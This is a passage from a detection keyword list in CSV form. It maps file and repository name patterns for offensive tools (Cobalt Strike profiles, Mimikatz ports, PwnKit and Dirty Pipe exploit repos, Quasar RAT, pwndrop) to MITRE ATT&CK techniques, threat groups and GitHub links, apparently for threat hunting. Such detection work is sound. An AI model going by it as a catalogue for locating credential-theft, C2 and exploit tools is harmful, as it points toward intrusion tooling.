These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z
-*/PwnDB.py*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z
-*/pwndrop.git*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*/pwndrop.ini*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z
-*/Pwned.as*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/PwnKit-Exploit*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z
-*/pxesploit/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/PXEThief*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z
-*/pxexploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/py_oneliner.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/py2exe/*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z
-*/pyasn1/*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z
-*/pycobalt-*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*/pycobalt/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z
-*/PyExec.git*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z
-*/pyinstaller/*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*/pykiller/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/pykiller/CVE-2022-23131,1,1,N/A,N/A,1,0,0,2022-02-24T11:59:48Z,2022-02-24T11:34:27Z
-*/pyLAPS.git*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z
-*/pyLAPS.py*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from 
linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z
-*/pypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-*/pypykatz.py*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/skelsec/pypykatz,1,1,N/A,10,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-*/pyrdp.git*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z
-*/pyrdp:latest*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z
-*/Pysoserial.git*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that 
utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,1,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z
-*/pystinger.zip*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z
-*/Python-dynload-os.h*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/pywerview*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*/pywhisker.git*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*/pywsus.git*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,1,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -*/pywsus.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/pywsus-master.zip*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,1,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -*/qakbot.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/qconn-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/QHpix/CVE-2021-44521*,offensive_tool_keyword,POC,Automated PoC exploitation of CVE-2021-44521,T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/QHpix/CVE-2021-44521,1,1,N/A,N/A,1,9,2,2022-02-24T12:04:40Z,2022-02-24T11:07:34Z -*/qscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quake1-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quake3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quake3-master-getservers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/quantloader.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/Quasar.git*,offensive_tool_keyword,QuasarRAT,Free. 
Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*/Quasar.v*.zip*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*/Quasar/releases*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*/quicserver.exe*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*/r00t-3xp10it*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/raceabrt.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/rahul1406/cve-2022-0847dirtypipe-exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/RAI.git*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/rakjong/mimikatz_bypassAV/*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - 